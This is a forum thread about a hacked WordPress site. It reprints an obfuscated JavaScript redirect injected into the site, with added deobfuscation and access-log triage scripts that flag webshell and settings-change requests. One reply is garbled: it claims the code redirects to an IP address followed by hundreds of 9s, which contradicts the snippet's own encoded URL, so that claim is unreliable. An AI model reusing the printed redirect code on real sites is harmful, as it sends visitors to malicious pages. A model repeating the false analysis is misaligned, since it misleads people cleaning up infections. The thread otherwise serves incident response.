Unexpected Redirects and Suspicious Code on WP Site

Started by Odkazylevne, Sep 04, 2024, 12:25 AM

Odkazylevne (Topic starter)

The website runs on WP. When you try to access it, an initial redirect occurs to


then to


and a snippet of code emerges:

window.stop();
function _0x4165(_0x1c7833,_0x312763){var _0x384719=_0x3847();return _0x4165=function(_0x4165ff,_0x4cb21c){_0x4165ff=_0x4165ff-0x185;var _0x3edf04=_0x384719[_0x4165ff];return _0x3edf04;},_0x4165(_0x1c7833,_0x312763);}
var _0x2ca8a2=_0x4165;
(function(_0x538cc7,_0x2ae31a){var _0x173fc3=_0x4165,_0x5b6817=_0x538cc7();while(!![]){try{var _0x1b9268=parseInt(_0x173fc3(0x18e))/0x1+parseInt(_0x173fc3(0x191))/0x2*(parseInt(_0x173fc3(0x18d))/0x3)+parseInt(_0x173fc3(0x18f))/0x4+-parseInt(_0x173fc3(0x189))/0x5*(-parseInt(_0x173fc3(0x18c))/0x6)+-parseInt(_0x173fc3(0x186))/0x7+-parseInt(_0x173fc3(0x187))/0x8*(parseInt(_0x173fc3(0x18a))/0x9)+parseInt(_0x173fc3(0x18b))/0xa;if(_0x1b9268===_0x2ae31a)break;else _0x5b6817['push'](_0x5b6817['shift']());}catch(_0x1fc706){_0x5b6817['push'](_0x5b6817['shift']());}}}(_0x3847,0xe77a1));
var ll=_0x2ca8a2(0x190);
document[_0x2ca8a2(0x188)][_0x2ca8a2(0x185)]=ll,window[_0x2ca8a2(0x188)][_0x2ca8a2(0x192)](ll);
function _0x3847(){var _0x786271=['688400bYXEDO','replace','href','5956636QUrnAb','47696JxEbld','location','296330XygErO','2358VtSkab','19357140uMcgeD','18tMFlRH','3cAvVrX','231172tCDMyi','2688948VEEIEX',String.fromCharCode(104,116,116,112,115,58,47,47,116,114,105,99,107,46,116,114,97,105,110,114,101,115,105,115,116,111,114,46,99,99,47,97,46,112,104,112,63,115,105,100,61,49,49,49,49,49,49,38,117,116,109,95,115,111,117,114,99,101,61,55,53,52,56,52,53)];_0x3847=function(){return _0x786271;};return _0x3847();}
What might be causin' this? Virus?

Aibolit check didn't show anythin'. But ESET NOD32 complains when openin' the website.


When you try to access your site, you're gettin' redirected to a couple of weird URLs:

Now, I don't know about you, but those don't look like any legitimate URLs for a WordPress site. It's like someone's tryin' to send you on a wild goose chase. And then, to top it all off, you're seein' some mysterious code snippet pop up on your screen. That's not the kind of welcome mat I like to see when I visit a website.

Now, let's talk about that code snippet. It's a bit of obfuscated JavaScript, which is just a fancy way of sayin' it's been deliberately made hard to read. The folks who wrote it are tryin' to hide what it does, which is usually a big red flag that somethin' sneaky is goin' on. But don't you worry, I've got my trusty deobfuscator handy, and let's see what we can make of this mess.

After runnin' the code through the deobfuscator, we can see that it's tryin' to change the location.href property of the window object. In other words, it's tryin' to redirect you to a new URL. And wouldn't you know it, that new URL is `hxxp://185.244.125[.]130/999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999'
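
To see what the posted snippet resolves to without loading it in a browser, here is an added example (not from the original post or any of the repliers) that re-implements the two mechanics the obfuscator relies on: the string-table rotation that runs until a numeric checksum matches, and the offset lookup (`index - 0x185`) into the rotated table. The string table, the checksum expression and the char codes are transcribed from the snippet above; the `document[...][...] = ll` / `window[...][...](ll)` bracket-and-call shape is an assumption where the paste lost characters, reconstructed from the names the lookups resolve to. The decoded URL is printed defanged (hxxp, [.]) in the same style as the other indicators in the thread.

```javascript
// Added example: static recovery of the string table used by the obfuscated
// redirect snippet posted above. Nothing from the sample is executed; the
// shuffle loop and the lookups are re-implemented so the strings can be read.

// Char codes copied from the String.fromCharCode(...) call in the snippet.
const URL_CHAR_CODES = [104,116,116,112,115,58,47,47,116,114,105,99,107,46,116,114,97,105,110,
  114,101,115,105,115,116,111,114,46,99,99,47,97,46,112,104,112,63,115,105,100,61,49,49,49,49,
  49,49,38,117,116,109,95,115,111,117,114,99,101,61,55,53,52,56,52,53];

// String table copied from the _0x3847() function in the snippet, in its original order.
const STRING_TABLE = ['688400bYXEDO','replace','href','5956636QUrnAb','47696JxEbld','location',
  '296330XygErO','2358VtSkab','19357140uMcgeD','18tMFlRH','3cAvVrX','231172tCDMyi',
  '2688948VEEIEX', String.fromCharCode(...URL_CHAR_CODES)];

const BASE = 0x185;     // _0x4165 subtracts this before indexing the table
const TARGET = 0xe77a1; // checksum the shuffle loop waits for (948129)

// The obfuscator's accessor: table[index - BASE] against the current rotation.
function makeAccessor(table) {
  return (i) => table[i - BASE];
}

// The checksum expression from the IIFE, transcribed term by term.
// parseInt('688400bYXEDO') is 688400; parseInt('href') is NaN, which never matches.
function checksum(f) {
  return parseInt(f(0x18e)) / 0x1
    + parseInt(f(0x191)) / 0x2 * (parseInt(f(0x18d)) / 0x3)
    + parseInt(f(0x18f)) / 0x4
    + -parseInt(f(0x189)) / 0x5 * (-parseInt(f(0x18c)) / 0x6)
    + -parseInt(f(0x186)) / 0x7
    + -parseInt(f(0x187)) / 0x8 * (parseInt(f(0x18a)) / 0x9)
    + parseInt(f(0x18b)) / 0xa;
}

// Emulate the while(true){ ... push(shift()) } loop: rotate the table left
// until the checksum matches. Returns the rotation count and the rotated copy.
function resolveRotation(table) {
  const work = table.slice();
  for (let r = 0; r < work.length; r++) {
    if (checksum(makeAccessor(work)) === TARGET) return { rotation: r, table: work };
    work.push(work.shift());
  }
  throw new Error('no rotation satisfies the checksum');
}

// Defang the way the thread does (hxxp, [.]) so the output is not clickable.
function defang(url) {
  return url.replace(/^http/, 'hxxp').replace(/\./g, '[.]');
}

// Resolve the lookups the snippet performs after the shuffle. The bracket/call
// syntax below is assumed (lost in the paste); the property names are what resolve.
//   var ll = f(0x190);
//   document[f(0x188)][f(0x185)] = ll;
//   window[f(0x188)][f(0x192)](ll);
function deobfuscate() {
  const { rotation, table } = resolveRotation(STRING_TABLE);
  const f = makeAccessor(table);
  return {
    rotation,
    assignment: `document.${f(0x188)}.${f(0x185)} = <url>`,
    call: `window.${f(0x188)}.${f(0x192)}(<url>)`,
    url: defang(f(0x190)),
  };
}

console.log(deobfuscate());
```

The checksum only matches after the table has been rotated twice, which is why reading the array literal as-is puts `location` and `href` in the wrong slots; every index in the snippet has to be read against the rotated table. The same approach works for other samples from this obfuscator family: copy the table and the checksum expression, rotate until the target matches, then resolve each call site.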


Hey there, folks. Same old story. Those sneaky scammers found a way to infiltrate MySQL and altered the siteurl entry in the wp_options table to point to their bogus link. And wouldn't ya know it, the redirects are already up and running for 'em. Yep, I'm using that PublishPress Capabilities plugin, too (one of 'em listed up there). Maybe there's a real vulnerability there, who knows?


When you've got a specific date and time in mind, go ahead and open up that access.log file to see what was going on with that suspicious IP address at that exact moment. Maybe it was sending a POST request to some shady xmlrpc.php, or maybe something else entirely, like a malicious file hiding on your site (could be the backdoor you've been looking for).

Or maybe, just maybe, the file itself wasn't the problem, but something was injected into it, like a sneaky piece of code, often padded with a bunch of spaces so it didn't stand out like a sore thumb... there are a lot of possibilities here. Basically, I was suggesting you take a gander at the logs, do some digging, and find the root of the problem... for free, no less! But hey, if you don't want to bother, then don't; just go ahead and look for all the requests from that IP address for starters, see what's shaking.
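
As an added example of the log triage suggested above (not code from any poster in the thread), here is a small Node.js script that pulls every request from one IP inside a time window out of an Apache combined-format access.log and flags the request shapes the reply mentions: POSTs to xmlrpc.php, PHP being served out of wp-content/uploads, and writes to wp-admin/options.php (which is where a changed siteurl would come from if it went through WordPress rather than straight into MySQL). The log lines, the IP 203.0.113.77 and the time window are constructed for the example.

```javascript
// Added example: first-pass triage of an Apache access.log around a known IP and
// time window. The log lines below are constructed (RFC 5737 documentation IPs).

const MONTHS = { Jan:0, Feb:1, Mar:2, Apr:3, May:4, Jun:5, Jul:6, Aug:7, Sep:8, Oct:9, Nov:10, Dec:11 };

// Apache "combined" format: host ident user [time] "METHOD path proto" status bytes "referer" "agent"
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)(?: \S+)?" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/;

// "03/Sep/2024:22:01:15 +0000" -> Date, honouring the zone offset in the log.
function parseApacheTime(s) {
  const m = /^(\d{2})\/(\w{3})\/(\d{4}):(\d{2}):(\d{2}):(\d{2}) ([+-])(\d{2})(\d{2})$/.exec(s);
  if (!m) return null;
  const [, d, mon, y, hh, mm, ss, sign, oh, om] = m;
  const wallClock = Date.UTC(+y, MONTHS[mon], +d, +hh, +mm, +ss);
  const offsetMin = (sign === '-' ? -1 : 1) * (+oh * 60 + +om);
  return new Date(wallClock - offsetMin * 60 * 1000);
}

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null; // unparseable line: skip rather than crash the triage
  const [, ip, time, method, path, status, bytes, referer, agent] = m;
  return { ip, time: parseApacheTime(time), method, path, status: +status, bytes, referer, agent, raw: line };
}

// Each rule returns a reason string or null. Extend with whatever your site should never serve.
const RULES = [
  r => r.method === 'POST' && /^\/xmlrpc\.php/.test(r.path) ? 'POST to xmlrpc.php' : null,
  r => /^\/wp-content\/uploads\/.*\.php/i.test(r.path) ? 'PHP executed from wp-content/uploads (webshell?)' : null,
  r => r.method === 'POST' && /^\/wp-admin\/options\.php/.test(r.path) ? 'settings write (check siteurl/home in wp_options)' : null,
  r => r.method === 'POST' && /^\/wp-login\.php/.test(r.path) ? 'login attempt' : null,
];

// All requests from `ip` within [from, to], plus the subset that matched a rule.
function triage(lines, ip, from, to) {
  const requests = lines.map(parseLine)
    .filter(r => r && r.ip === ip && r.time && r.time >= from && r.time <= to)
    .sort((a, b) => a.time - b.time);
  const flagged = [];
  for (const r of requests) {
    const reasons = RULES.map(rule => rule(r)).filter(Boolean);
    if (reasons.length) flagged.push({ time: r.time.toISOString(), method: r.method, path: r.path, status: r.status, reasons });
  }
  return { requests: requests.length, flagged };
}

// Constructed sample log: one noisy IP, one bystander, one hit outside the window.
const SAMPLE_LOG = [
  '203.0.113.77 - - [03/Sep/2024:21:58:02 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '203.0.113.77 - - [03/Sep/2024:22:01:15 +0000] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
  '203.0.113.77 - - [03/Sep/2024:22:01:16 +0000] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [03/Sep/2024:22:02:40 +0000] "GET /wp-content/themes/x/style.css HTTP/1.1" 200 8801 "-" "Mozilla/5.0"',
  '203.0.113.77 - - [03/Sep/2024:22:03:09 +0000] "GET /wp-content/uploads/2024/08/cache.php?c=id HTTP/1.1" 200 96 "-" "python-requests/2.31"',
  '203.0.113.77 - - [03/Sep/2024:22:03:41 +0000] "POST /wp-admin/options.php HTTP/1.1" 302 0 "-" "python-requests/2.31"',
  '203.0.113.77 - - [04/Sep/2024:06:30:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
];

// Window and IP are assumptions for the example; in practice take them from the
// time the redirect was first noticed and the IP that stood out in the log.
const WINDOW = { ip: '203.0.113.77', from: new Date('2024-09-03T22:00:00Z'), to: new Date('2024-09-03T22:05:00Z') };

function runExample() {
  return triage(SAMPLE_LOG, WINDOW.ip, WINDOW.from, WINDOW.to);
}

console.log(JSON.stringify(runExample(), null, 2));
```

Read the flagged list top to bottom as a timeline: the xmlrpc.php POSTs are the usual entry attempt, a 200 on a .php under uploads is the webshell being used, and the options.php POST right after is the settings change. Once the first flagged request is found, widen the window backwards and drop the IP filter, because the file under uploads had to be written by an earlier request, possibly from a different address.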

